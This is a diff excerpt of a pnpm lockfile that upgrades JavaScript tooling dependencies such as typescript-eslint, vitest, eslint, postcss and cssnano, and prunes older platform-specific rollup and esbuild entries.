-  '@rollup/rollup-linux-s390x-gnu@4.52.5':
-    optional: true
-
-  '@rollup/rollup-linux-x64-gnu@4.34.6':
-    optional: true
-
-  '@rollup/rollup-linux-x64-gnu@4.52.5':
-    optional: true
-
-  '@rollup/rollup-linux-x64-musl@4.34.6':
-    optional: true
-
-  '@rollup/rollup-linux-x64-musl@4.52.5':
-    optional: true
-
-  '@rollup/rollup-openharmony-arm64@4.52.5':
-    optional: true
-
-  '@rollup/rollup-win32-arm64-msvc@4.34.6':
-    optional: true
-
-  '@rollup/rollup-win32-arm64-msvc@4.52.5':
-    optional: true
-
-  '@rollup/rollup-win32-ia32-msvc@4.34.6':
-    optional: true
-
-  '@rollup/rollup-win32-ia32-msvc@4.52.5':
-    optional: true
-
-  '@rollup/rollup-win32-x64-gnu@4.52.5':
-    optional: true
-
-  '@rollup/rollup-win32-x64-msvc@4.34.6':
-    optional: true
-
-  '@rollup/rollup-win32-x64-msvc@4.52.5':
-    optional: true
+  '@standard-schema/spec@1.1.0': {}
 
   '@types/chai@5.2.3':
     dependencies:
@@ -4235,6 +3643,8 @@ snapshots:
   '@types/estree@1.0.6': {}
 
   '@types/estree@1.0.8': {}
+
+  '@types/estree@1.0.9': {}
 
   '@types/json-schema@7.0.15': {}
 
@@ -4263,206 +3673,163 @@ snapshots:
       '@types/configstore': 6.0.2
       boxen: 7.1.1
 
-  '@typescript-eslint/eslint-plugin@8.46.2(@typescript-eslint/parser@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3))(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)':
+  '@typescript-eslint/eslint-plugin@8.65.0(@typescript-eslint/parser@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3))(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)':
     dependencies:
-      '@eslint-community/regexpp': 4.12.1
-      '@typescript-eslint/parser': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      '@typescript-eslint/scope-manager': 8.46.2
-      '@typescript-eslint/type-utils': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      '@typescript-eslint/utils': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      '@typescript-eslint/visitor-keys': 8.46.2
-      eslint: 9.38.0(jiti@2.6.1)
-      graphemer: 1.4.0
-      ignore: 7.0.3
+      '@eslint-community/regexpp': 4.12.2
+      '@typescript-eslint/parser': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      '@typescript-eslint/scope-manager': 8.65.0
+      '@typescript-eslint/type-utils': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      '@typescript-eslint/utils': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      '@typescript-eslint/visitor-keys': 8.65.0
+      eslint: 9.39.5(jiti@2.6.1)
+      ignore: 7.0.6
       natural-compare: 1.4.0
-      ts-api-utils: 2.1.0(typescript@5.9.3)
+      ts-api-utils: 2.5.0(typescript@5.9.3)
       typescript: 5.9.3
     transitivePeerDependencies:
       - supports-color
 
-  '@typescript-eslint/parser@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)':
+  '@typescript-eslint/parser@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)':
     dependencies:
-      '@typescript-eslint/scope-manager': 8.46.2
-      '@typescript-eslint/types': 8.46.2
-      '@typescript-eslint/typescript-estree': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/visitor-keys': 8.46.2
-      debug: 4.4.0
-      eslint: 9.38.0(jiti@2.6.1)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/project-service@8.46.2(typescript@5.9.3)':
-    dependencies:
-      '@typescript-eslint/tsconfig-utils': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/types': 8.46.2
-      debug: 4.4.0
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/scope-manager@8.23.0':
-    dependencies:
-      '@typescript-eslint/types': 8.23.0
-      '@typescript-eslint/visitor-keys': 8.23.0
-
-  '@typescript-eslint/scope-manager@8.46.2':
-    dependencies:
-      '@typescript-eslint/types': 8.46.2
-      '@typescript-eslint/visitor-keys': 8.46.2
-
-  '@typescript-eslint/tsconfig-utils@8.46.2(typescript@5.9.3)':
-    dependencies:
-      typescript: 5.9.3
-
-  '@typescript-eslint/type-utils@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)':
-    dependencies:
-      '@typescript-eslint/types': 8.46.2
-      '@typescript-eslint/typescript-estree': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/utils': 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      debug: 4.4.0
-      eslint: 9.38.0(jiti@2.6.1)
-      ts-api-utils: 2.1.0(typescript@5.9.3)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/types@8.23.0': {}
-
-  '@typescript-eslint/types@8.46.2': {}
-
-  '@typescript-eslint/typescript-estree@8.23.0(typescript@5.9.3)':
-    dependencies:
-      '@typescript-eslint/types': 8.23.0
-      '@typescript-eslint/visitor-keys': 8.23.0
-      debug: 4.4.0
-      fast-glob: 3.3.3
-      is-glob: 4.0.3
-      minimatch: 9.0.5
-      semver: 7.7.2
-      ts-api-utils: 2.0.1(typescript@5.9.3)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/typescript-estree@8.46.2(typescript@5.9.3)':
-    dependencies:
-      '@typescript-eslint/project-service': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/tsconfig-utils': 8.46.2(typescript@5.9.3)
-      '@typescript-eslint/types': 8.46.2
-      '@typescript-eslint/visitor-keys': 8.46.2
-      debug: 4.4.0
-      fast-glob: 3.3.3
-      is-glob: 4.0.3
-      minimatch: 9.0.5
-      semver: 7.7.2
-      ts-api-utils: 2.1.0(typescript@5.9.3)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/utils@8.23.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)':
-    dependencies:
-      '@eslint-community/eslint-utils': 4.4.1(eslint@9.38.0(jiti@2.6.1))
-      '@typescript-eslint/scope-manager': 8.23.0
-      '@typescript-eslint/types': 8.23.0
-      '@typescript-eslint/typescript-estree': 8.23.0(typescript@5.9.3)
-      eslint: 9.38.0(jiti@2.6.1)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/utils@8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)':
-    dependencies:
-      '@eslint-community/eslint-utils': 4.9.0(eslint@9.38.0(jiti@2.6.1))
-      '@typescript-eslint/scope-manager': 8.46.2
-      '@typescript-eslint/types': 8.46.2
-      '@typescript-eslint/typescript-estree': 8.46.2(typescript@5.9.3)
-      eslint: 9.38.0(jiti@2.6.1)
-      typescript: 5.9.3
-    transitivePeerDependencies:
-      - supports-color
-
-  '@typescript-eslint/visitor-keys@8.23.0':
-    dependencies:
-      '@typescript-eslint/types': 8.23.0
-      eslint-visitor-keys: 4.2.0
-
-  '@typescript-eslint/visitor-keys@8.46.2':
-    dependencies:
-      '@typescript-eslint/types': 8.46.2
-      eslint-visitor-keys: 4.2.1
-
-  '@vitest/coverage-v8@3.2.4(vitest@3.2.4(@types/node@24.9.1)(jiti@2.6.1))':
-    dependencies:
-      '@ampproject/remapping': 2.3.0
-      '@bcoe/v8-coverage': 1.0.2
-      ast-v8-to-istanbul: 0.3.7
+      '@typescript-eslint/scope-manager': 8.65.0
+      '@typescript-eslint/types': 8.65.0
+      '@typescript-eslint/typescript-estree': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/visitor-keys': 8.65.0
       debug: 4.4.3
+      eslint: 9.39.5(jiti@2.6.1)
+      typescript: 5.9.3
+    transitivePeerDependencies:
+      - supports-color
+
+  '@typescript-eslint/project-service@8.65.0(typescript@5.9.3)':
+    dependencies:
+      '@typescript-eslint/tsconfig-utils': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/types': 8.65.0
+      debug: 4.4.3
+      typescript: 5.9.3
+    transitivePeerDependencies:
+      - supports-color
+
+  '@typescript-eslint/scope-manager@8.65.0':
+    dependencies:
+      '@typescript-eslint/types': 8.65.0
+      '@typescript-eslint/visitor-keys': 8.65.0
+
+  '@typescript-eslint/tsconfig-utils@8.65.0(typescript@5.9.3)':
+    dependencies:
+      typescript: 5.9.3
+
+  '@typescript-eslint/type-utils@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)':
+    dependencies:
+      '@typescript-eslint/types': 8.65.0
+      '@typescript-eslint/typescript-estree': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/utils': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      debug: 4.4.3
+      eslint: 9.39.5(jiti@2.6.1)
+      ts-api-utils: 2.5.0(typescript@5.9.3)
+      typescript: 5.9.3
+    transitivePeerDependencies:
+      - supports-color
+
+  '@typescript-eslint/types@8.65.0': {}
+
+  '@typescript-eslint/typescript-estree@8.65.0(typescript@5.9.3)':
+    dependencies:
+      '@typescript-eslint/project-service': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/tsconfig-utils': 8.65.0(typescript@5.9.3)
+      '@typescript-eslint/types': 8.65.0
+      '@typescript-eslint/visitor-keys': 8.65.0
+      debug: 4.4.3
+      minimatch: 10.2.5
+      semver: 7.8.5
+      tinyglobby: 0.2.15
+      ts-api-utils: 2.5.0(typescript@5.9.3)
+      typescript: 5.9.3
+    transitivePeerDependencies:
+      - supports-color
+
+  '@typescript-eslint/utils@8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)':
+    dependencies:
+      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.5(jiti@2.6.1))
+      '@typescript-eslint/scope-manager': 8.65.0
+      '@typescript-eslint/types': 8.65.0
+      '@typescript-eslint/typescript-estree': 8.65.0(typescript@5.9.3)
+      eslint: 9.39.5(jiti@2.6.1)
+      typescript: 5.9.3
+    transitivePeerDependencies:
+      - supports-color
+
+  '@typescript-eslint/visitor-keys@8.65.0':
+    dependencies:
+      '@typescript-eslint/types': 8.65.0
+      eslint-visitor-keys: 5.0.1
+
+  '@vitest/coverage-v8@4.1.10(vitest@4.1.10)':
+    dependencies:
+      '@bcoe/v8-coverage': 1.0.2
+      '@vitest/utils': 4.1.10
+      ast-v8-to-istanbul: 1.0.5
       istanbul-lib-coverage: 3.2.2
       istanbul-lib-report: 3.0.1
-      istanbul-lib-source-maps: 5.0.6
-      istanbul-reports: 3.1.7
-      magic-string: 0.30.17
-      magicast: 0.3.5
-      std-env: 3.10.0
-      test-exclude: 7.0.1
-      tinyrainbow: 2.0.0
-      vitest: 3.2.4(@types/node@24.9.1)(jiti@2.6.1)
-    transitivePeerDependencies:
-      - supports-color
+      istanbul-reports: 3.2.0
+      magicast: 0.5.3
+      obug: 2.1.4
+      std-env: 4.2.0
+      tinyrainbow: 3.1.0
+      vitest: 4.1.10(@types/node@24.9.1)(@vitest/coverage-v8@4.1.10)(vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1))
 
-  '@vitest/expect@3.2.4':
+  '@vitest/expect@4.1.10':
     dependencies:
+      '@standard-schema/spec': 1.1.0
       '@types/chai': 5.2.3
-      '@vitest/spy': 3.2.4
-      '@vitest/utils': 3.2.4
-      chai: 5.3.3
-      tinyrainbow: 2.0.0
+      '@vitest/spy': 4.1.10
+      '@vitest/utils': 4.1.10
+      chai: 6.2.2
+      tinyrainbow: 3.1.0
 
-  '@vitest/mocker@3.2.4(vite@6.1.0(@types/node@24.9.1)(jiti@2.6.1))':
+  '@vitest/mocker@4.1.10(vite@6.4.3(@types/node@24.9.1)(jiti@2.6.1))':
     dependencies:
-      '@vitest/spy': 3.2.4
+      '@vitest/spy': 4.1.10
       estree-walker: 3.0.3
-      magic-string: 0.30.17
+      magic-string: 0.30.21
     optionalDependencies:
-      vite: 6.1.0(@types/node@24.9.1)(jiti@2.6.1)
+      vite: 6.4.3(@types/node@24.9.1)(jiti@2.6.1)
 
-  '@vitest/pretty-format@3.2.4':
+  '@vitest/pretty-format@4.1.10':
     dependencies:
-      tinyrainbow: 2.0.0
+      tinyrainbow: 3.1.0
 
-  '@vitest/runner@3.2.4':
+  '@vitest/runner@4.1.10':
     dependencies:
-      '@vitest/utils': 3.2.4
-      pathe: 2.0.3
-      strip-literal: 3.1.0
-
-  '@vitest/snapshot@3.2.4':
-    dependencies:
-      '@vitest/pretty-format': 3.2.4
-      magic-string: 0.30.17
+      '@vitest/utils': 4.1.10
       pathe: 2.0.3
 
-  '@vitest/spy@3.2.4':
+  '@vitest/snapshot@4.1.10':
     dependencies:
-      tinyspy: 4.0.4
+      '@vitest/pretty-format': 4.1.10
+      '@vitest/utils': 4.1.10
+      magic-string: 0.30.21
+      pathe: 2.0.3
 
-  '@vitest/utils@3.2.4':
-    dependencies:
-      '@vitest/pretty-format': 3.2.4
-      loupe: 3.2.1
-      tinyrainbow: 2.0.0
+  '@vitest/spy@4.1.10': {}
 
-  acorn-jsx@5.3.2(acorn@8.15.0):
+  '@vitest/utils@4.1.10':
     dependencies:
-      acorn: 8.15.0
+      '@vitest/pretty-format': 4.1.10
+      convert-source-map: 2.0.0
+      tinyrainbow: 3.1.0
+
+  acorn-jsx@5.3.2(acorn@8.17.0):
+    dependencies:
+      acorn: 8.17.0
 
   acorn@8.14.0: {}
 
   acorn@8.15.0: {}
 
-  ajv@6.12.6:
+  acorn@8.17.0: {}
+
+  ajv@6.15.0:
     dependencies:
       fast-deep-equal: 3.1.3
       fast-json-stable-stringify: 2.1.0
@@ -4495,32 +3862,32 @@ snapshots:
 
   assertion-error@2.0.1: {}
 
-  ast-v8-to-istanbul@0.3.7:
+  ast-v8-to-istanbul@1.0.5:
     dependencies:
       '@jridgewell/trace-mapping': 0.3.31
       estree-walker: 3.0.3
-      js-tokens: 9.0.1
+      js-tokens: 10.0.0
 
   atomically@2.0.3:
     dependencies:
       stubborn-fs: 1.2.5
       when-exit: 2.1.4
 
-  automd@0.4.2(magicast@0.3.5):
+  automd@0.4.3(magicast@0.5.3):
     dependencies:
-      '@parcel/watcher': 2.5.1
-      c12: 3.3.1(magicast@0.3.5)
-      citty: 0.1.6
+      '@parcel/watcher': 2.6.0
+      c12: 3.3.4(magicast@0.5.3)
+      citty: 0.2.2
       consola: 3.4.2
-      defu: 6.1.4
+      defu: 6.1.7
       destr: 2.0.5
       didyoumean2: 7.0.4
-      magic-string: 0.30.19
+      magic-string: 0.30.21
       mdbox: 0.1.1
       mlly: 1.8.0
-      ofetch: 1.4.1
+      ofetch: 1.5.1
       pathe: 2.0.3
-      perfect-debounce: 2.0.0
+      perfect-debounce: 2.1.0
       pkg-types: 2.3.0
       scule: 1.3.0
       tinyglobby: 0.2.15
@@ -4528,21 +3895,21 @@ snapshots:
     transitivePeerDependencies:
       - magicast
 
-  autoprefixer@10.4.21(postcss@8.5.6):
+  autoprefixer@10.4.21(postcss@8.5.21):
     dependencies:
       browserslist: 4.24.4
       caniuse-lite: 1.0.30001751
       fraction.js: 4.3.7
       normalize-range: 0.1.2
       picocolors: 1.1.1
-      postcss: 8.5.6
+      postcss: 8.5.21
       postcss-value-parser: 4.2.0
 
   balanced-match@1.0.2: {}
 
-  baseline-browser-mapping@2.8.19: {}
+  balanced-match@4.0.4: {}
 
-  before-after-hook@2.2.3: {}
+  baseline-browser-mapping@2.8.19: {}
 
   better-path-resolve@1.0.0:
     dependencies:
@@ -4572,14 +3939,14 @@ snapshots:
       widest-line: 5.0.0
       wrap-ansi: 9.0.0
 
-  brace-expansion@1.1.11:
+  brace-expansion@1.1.16:
     dependencies:
       balanced-match: 1.0.2
       concat-map: 0.0.1
 
-  brace-expansion@2.0.1:
+  brace-expansion@5.0.7:
     dependencies:
-      balanced-match: 1.0.2
+      balanced-match: 4.0.4
 
   braces@3.0.3:
     dependencies:
@@ -4602,26 +3969,22 @@ snapshots:
 
   builtin-modules@5.0.0: {}
 
-  c12@3.3.1(magicast@0.3.5):
+  c12@3.3.4(magicast@0.5.3):
     dependencies:
-      chokidar: 4.0.3
-      confbox: 0.2.2
-      defu: 6.1.4
-      dotenv: 17.2.3
-      exsolve: 1.0.7
-      giget: 2.0.0
+      chokidar: 5.0.0
+      confbox: 0.2.4
+      defu: 6.1.7
+      dotenv: 17.4.2
+      exsolve: 1.1.0
+      giget: 3.3.0
       jiti: 2.6.1
       ohash: 2.0.11
       pathe: 2.0.3
-      perfect-debounce: 2.0.0
+      perfect-debounce: 2.1.0
       pkg-types: 2.3.0
-      rc9: 2.1.2
+      rc9: 3.0.1
     optionalDependencies:
-      magicast: 0.3.5
-
-  cac@6.7.14: {}
-
-  call-me-maybe@1.0.2: {}
+      magicast: 0.5.3
 
   callsites@3.1.0: {}
 
@@ -4640,13 +4003,7 @@ snapshots:
 
   caniuse-lite@1.0.30001751: {}
 
-  chai@5.3.3:
-    dependencies:
-      assertion-error: 2.0.1
-      check-error: 2.1.1
-      deep-eql: 5.0.2
-      loupe: 3.1.3
-      pathval: 2.0.0
+  chai@6.2.2: {}
 
   chalk@4.1.2:
     dependencies:
@@ -4663,19 +4020,17 @@ snapshots:
 
   chardet@2.1.0: {}
 
-  check-error@2.1.1: {}
-
-  chokidar@4.0.3:
+  chokidar@5.0.0:
     dependencies:
-      readdirp: 4.1.1
-
-  ci-info@3.9.0: {}
+      readdirp: 5.0.0
 
   ci-info@4.3.1: {}
 
   citty@0.1.6:
     dependencies:
       consola: 3.4.2
+
+  citty@0.2.2: {}
 
   clean-regexp@1.0.0:
     dependencies:
@@ -4703,6 +4058,8 @@ snapshots:
 
   confbox@0.2.2: {}
 
+  confbox@0.2.4: {}
+
   config-chain@1.1.13:
     dependencies:
       ini: 1.3.8
@@ -4719,6 +4076,8 @@ snapshots:
 
   consola@3.4.2: {}
 
+  convert-source-map@2.0.0: {}
+
   core-js-compat@3.46.0:
     dependencies:
       browserslist: 4.26.3
@@ -4729,9 +4088,9 @@ snapshots:
       shebang-command: 2.0.0
       which: 2.0.2
 
-  css-declaration-sorter@7.2.0(postcss@8.5.6):
+  css-declaration-sorter@7.2.0(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
   css-select@5.1.0:
     dependencies:
@@ -4755,49 +4114,49 @@ snapshots:
 
   cssesc@3.0.0: {}
 
-  cssnano-preset-default@7.0.9(postcss@8.5.6):
+  cssnano-preset-default@7.0.9(postcss@8.5.21):
     dependencies:
       browserslist: 4.26.3
-      css-declaration-sorter: 7.2.0(postcss@8.5.6)
-      cssnano-utils: 5.0.1(postcss@8.5.6)
-      postcss: 8.5.6
-      postcss-calc: 10.1.1(postcss@8.5.6)
-      postcss-colormin: 7.0.4(postcss@8.5.6)
-      postcss-convert-values: 7.0.7(postcss@8.5.6)
-      postcss-discard-comments: 7.0.4(postcss@8.5.6)
-      postcss-discard-duplicates: 7.0.2(postcss@8.5.6)
-      postcss-discard-empty: 7.0.1(postcss@8.5.6)
-      postcss-discard-overridden: 7.0.1(postcss@8.5.6)
-      postcss-merge-longhand: 7.0.5(postcss@8.5.6)
-      postcss-merge-rules: 7.0.6(postcss@8.5.6)
-      postcss-minify-font-values: 7.0.1(postcss@8.5.6)
-      postcss-minify-gradients: 7.0.1(postcss@8.5.6)
-      postcss-minify-params: 7.0.4(postcss@8.5.6)
-      postcss-minify-selectors: 7.0.5(postcss@8.5.6)
-      postcss-normalize-charset: 7.0.1(postcss@8.5.6)
-      postcss-normalize-display-values: 7.0.1(postcss@8.5.6)
-      postcss-normalize-positions: 7.0.1(postcss@8.5.6)
-      postcss-normalize-repeat-style: 7.0.1(postcss@8.5.6)
-      postcss-normalize-string: 7.0.1(postcss@8.5.6)
-      postcss-normalize-timing-functions: 7.0.1(postcss@8.5.6)
-      postcss-normalize-unicode: 7.0.4(postcss@8.5.6)
-      postcss-normalize-url: 7.0.1(postcss@8.5.6)
-      postcss-normalize-whitespace: 7.0.1(postcss@8.5.6)
-      postcss-ordered-values: 7.0.2(postcss@8.5.6)
-      postcss-reduce-initial: 7.0.4(postcss@8.5.6)
-      postcss-reduce-transforms: 7.0.1(postcss@8.5.6)
-      postcss-svgo: 7.1.0(postcss@8.5.6)
-      postcss-unique-selectors: 7.0.4(postcss@8.5.6)
+      css-declaration-sorter: 7.2.0(postcss@8.5.21)
+      cssnano-utils: 5.0.1(postcss@8.5.21)
+      postcss: 8.5.21
+      postcss-calc: 10.1.1(postcss@8.5.21)
+      postcss-colormin: 7.0.4(postcss@8.5.21)
+      postcss-convert-values: 7.0.7(postcss@8.5.21)
+      postcss-discard-comments: 7.0.4(postcss@8.5.21)
+      postcss-discard-duplicates: 7.0.2(postcss@8.5.21)
+      postcss-discard-empty: 7.0.1(postcss@8.5.21)
+      postcss-discard-overridden: 7.0.1(postcss@8.5.21)
+      postcss-merge-longhand: 7.0.5(postcss@8.5.21)
+      postcss-merge-rules: 7.0.6(postcss@8.5.21)
+      postcss-minify-font-values: 7.0.1(postcss@8.5.21)
+      postcss-minify-gradients: 7.0.1(postcss@8.5.21)
+      postcss-minify-params: 7.0.4(postcss@8.5.21)
+      postcss-minify-selectors: 7.0.5(postcss@8.5.21)
+      postcss-normalize-charset: 7.0.1(postcss@8.5.21)
+      postcss-normalize-display-values: 7.0.1(postcss@8.5.21)
+      postcss-normalize-positions: 7.0.1(postcss@8.5.21)
+      postcss-normalize-repeat-style: 7.0.1(postcss@8.5.21)
+      postcss-normalize-string: 7.0.1(postcss@8.5.21)
+      postcss-normalize-timing-functions: 7.0.1(postcss@8.5.21)
+      postcss-normalize-unicode: 7.0.4(postcss@8.5.21)
+      postcss-normalize-url: 7.0.1(postcss@8.5.21)
+      postcss-normalize-whitespace: 7.0.1(postcss@8.5.21)
+      postcss-ordered-values: 7.0.2(postcss@8.5.21)
+      postcss-reduce-initial: 7.0.4(postcss@8.5.21)
+      postcss-reduce-transforms: 7.0.1(postcss@8.5.21)
+      postcss-svgo: 7.1.0(postcss@8.5.21)
+      postcss-unique-selectors: 7.0.4(postcss@8.5.21)
 
-  cssnano-utils@5.0.1(postcss@8.5.6):
+  cssnano-utils@5.0.1(postcss@8.5.21):
     dependencies:
-      postcss: 8.5.6
+      postcss: 8.5.21
 
-  cssnano@7.1.1(postcss@8.5.6):
+  cssnano@7.1.1(postcss@8.5.21):
     dependencies:
-      cssnano-preset-default: 7.0.9(postcss@8.5.6)
+      cssnano-preset-default: 7.0.9(postcss@8.5.21)
       lilconfig: 3.1.3
-      postcss: 8.5.6
+      postcss: 8.5.21
 
   csso@5.0.5:
     dependencies:
@@ -4805,17 +4164,9 @@ snapshots:
 
   dataloader@1.4.0: {}
 
-  debug@4.4.0:
-    dependencies:
-      ms: 2.1.3
-
   debug@4.4.3:
     dependencies:
       ms: 2.1.3
-
-  decode-uri-component@0.4.1: {}
-
-  deep-eql@5.0.2: {}
 
   deep-extend@0.6.0: {}
 
@@ -4823,15 +4174,13 @@ snapshots:
 
   deepmerge@4.3.1: {}
 
-  defu@6.1.4: {}
-
-  deprecation@2.3.1: {}
+  defu@6.1.7: {}
 
   destr@2.0.5: {}
 
   detect-indent@6.1.0: {}
 
-  detect-libc@1.0.3: {}
+  detect-libc@2.1.2: {}
 
   didyoumean2@7.0.4:
     dependencies:
@@ -4865,7 +4214,7 @@ snapshots:
     dependencies:
       type-fest: 4.41.0
 
-  dotenv@17.2.3: {}
+  dotenv@17.4.2: {}
 
   dotenv@8.6.0: {}
 
@@ -4888,35 +4237,7 @@ snapshots:
 
   entities@4.5.0: {}
 
-  es-module-lexer@1.7.0: {}
-
-  esbuild@0.24.2:
-    optionalDependencies:
-      '@esbuild/aix-ppc64': 0.24.2
-      '@esbuild/android-arm': 0.24.2
-      '@esbuild/android-arm64': 0.24.2
-      '@esbuild/android-x64': 0.24.2
-      '@esbuild/darwin-arm64': 0.24.2
-      '@esbuild/darwin-x64': 0.24.2
-      '@esbuild/freebsd-arm64': 0.24.2
-      '@esbuild/freebsd-x64': 0.24.2
-      '@esbuild/linux-arm': 0.24.2
-      '@esbuild/linux-arm64': 0.24.2
-      '@esbuild/linux-ia32': 0.24.2
-      '@esbuild/linux-loong64': 0.24.2
-      '@esbuild/linux-mips64el': 0.24.2
-      '@esbuild/linux-ppc64': 0.24.2
-      '@esbuild/linux-riscv64': 0.24.2
-      '@esbuild/linux-s390x': 0.24.2
-      '@esbuild/linux-x64': 0.24.2
-      '@esbuild/netbsd-arm64': 0.24.2
-      '@esbuild/netbsd-x64': 0.24.2
-      '@esbuild/openbsd-arm64': 0.24.2
-      '@esbuild/openbsd-x64': 0.24.2
-      '@esbuild/sunos-x64': 0.24.2
-      '@esbuild/win32-arm64': 0.24.2
-      '@esbuild/win32-ia32': 0.24.2
-      '@esbuild/win32-x64': 0.24.2
+  es-module-lexer@2.3.1: {}
 
   esbuild@0.25.11:
     optionalDependencies:
@@ -4955,58 +4276,58 @@ snapshots:
 
   escape-string-regexp@4.0.0: {}
 
-  eslint-config-prettier@10.1.8(eslint@9.38.0(jiti@2.6.1)):
+  eslint-config-prettier@10.1.8(eslint@9.39.5(jiti@2.6.1)):
     dependencies:
-      eslint: 9.38.0(jiti@2.6.1)
+      eslint: 9.39.5(jiti@2.6.1)
 
-  eslint-config-unjs@0.5.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3):
+  eslint-config-unjs@0.5.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3):
     dependencies:
-      '@eslint/js': 9.38.0
-      eslint: 9.38.0(jiti@2.6.1)
-      eslint-plugin-markdown: 5.1.0(eslint@9.38.0(jiti@2.6.1))
-      eslint-plugin-unicorn: 59.0.1(eslint@9.38.0(jiti@2.6.1))
+      '@eslint/js': 9.39.5
+      eslint: 9.39.5(jiti@2.6.1)
+      eslint-plugin-markdown: 5.1.0(eslint@9.39.5(jiti@2.6.1))
+      eslint-plugin-unicorn: 59.0.1(eslint@9.39.5(jiti@2.6.1))
       globals: 16.4.0
       typescript: 5.9.3
-      typescript-eslint: 8.46.2(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
+      typescript-eslint: 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
     transitivePeerDependencies:
       - supports-color
 
-  eslint-plugin-markdown@5.1.0(eslint@9.38.0(jiti@2.6.1)):
+  eslint-plugin-markdown@5.1.0(eslint@9.39.5(jiti@2.6.1)):
     dependencies:
-      eslint: 9.38.0(jiti@2.6.1)
+      eslint: 9.39.5(jiti@2.6.1)
       mdast-util-from-markdown: 0.8.5
     transitivePeerDependencies:
       - supports-color
 
-  eslint-plugin-prettier@5.5.4(eslint-config-prettier@10.1.8(eslint@9.38.0(jiti@2.6.1)))(eslint@9.38.0(jiti@2.6.1))(prettier@3.6.2):
+  eslint-plugin-prettier@5.5.6(eslint-config-prettier@10.1.8(eslint@9.39.5(jiti@2.6.1)))(eslint@9.39.5(jiti@2.6.1))(prettier@3.9.6):
     dependencies:
-      eslint: 9.38.0(jiti@2.6.1)
-      prettier: 3.6.2
-      prettier-linter-helpers: 1.0.0
-      synckit: 0.11.11
+      eslint: 9.39.5(jiti@2.6.1)
+      prettier: 3.9.6
+      prettier-linter-helpers: 1.0.1
+      synckit: 0.11.13
     optionalDependencies:
-      eslint-config-prettier: 10.1.8(eslint@9.38.0(jiti@2.6.1))
+      eslint-config-prettier: 10.1.8(eslint@9.39.5(jiti@2.6.1))
 
-  eslint-plugin-sort@4.0.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3):
+  eslint-plugin-sort@4.0.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3):
     dependencies:
-      '@typescript-eslint/utils': 8.23.0(eslint@9.38.0(jiti@2.6.1))(typescript@5.9.3)
-      eslint: 9.38.0(jiti@2.6.1)
+      '@typescript-eslint/utils': 8.65.0(eslint@9.39.5(jiti@2.6.1))(typescript@5.9.3)
+      eslint: 9.39.5(jiti@2.6.1)
       isomorphic-resolve: 1.0.0
       natural-compare: 1.4.0
     transitivePeerDependencies:
       - supports-color
       - typescript
 
-  eslint-plugin-unicorn@59.0.1(eslint@9.38.0(jiti@2.6.1)):
+  eslint-plugin-unicorn@59.0.1(eslint@9.39.5(jiti@2.6.1)):
     dependencies:
-      '@babel/helper-validator-identifier': 7.25.9
-      '@eslint-community/eslint-utils': 4.9.0(eslint@9.38.0(jiti@2.6.1))
+      '@babel/helper-validator-identifier': 7.29.7
+      '@eslint-community/eslint-utils': 4.9.1(eslint@9.39.5(jiti@2.6.1))
       '@eslint/plugin-kit': 0.2.8
       ci-info: 4.3.1
       clean-regexp: 1.0.0
       core-js-compat: 3.46.0
-      eslint: 9.38.0(jiti@2.6.1)
-      esquery: 1.6.0
+      eslint: 9.39.5(jiti@2.6.1)
+      esquery: 1.7.0
       find-up-simple: 1.0.1
       globals: 16.4.0
       indent-string: 5.0.0
@@ -5015,7 +4336,7 @@ snapshots:
       pluralize: 8.0.0
       regexp-tree: 0.1.27
       regjsparser: 0.12.0
-      semver: 7.7.2
+      semver: 7.8.5
       strip-indent: 4.1.1
 
   eslint-scope@8.4.0:
@@ -5025,33 +4346,33 @@ snapshots:
 
   eslint-visitor-keys@3.4.3: {}
 
-  eslint-visitor-keys@4.2.0: {}
-
   eslint-visitor-keys@4.2.1: {}
 
-  eslint@9.38.0(jiti@2.6.1):
+  eslint-visitor-keys@5.0.1: {}
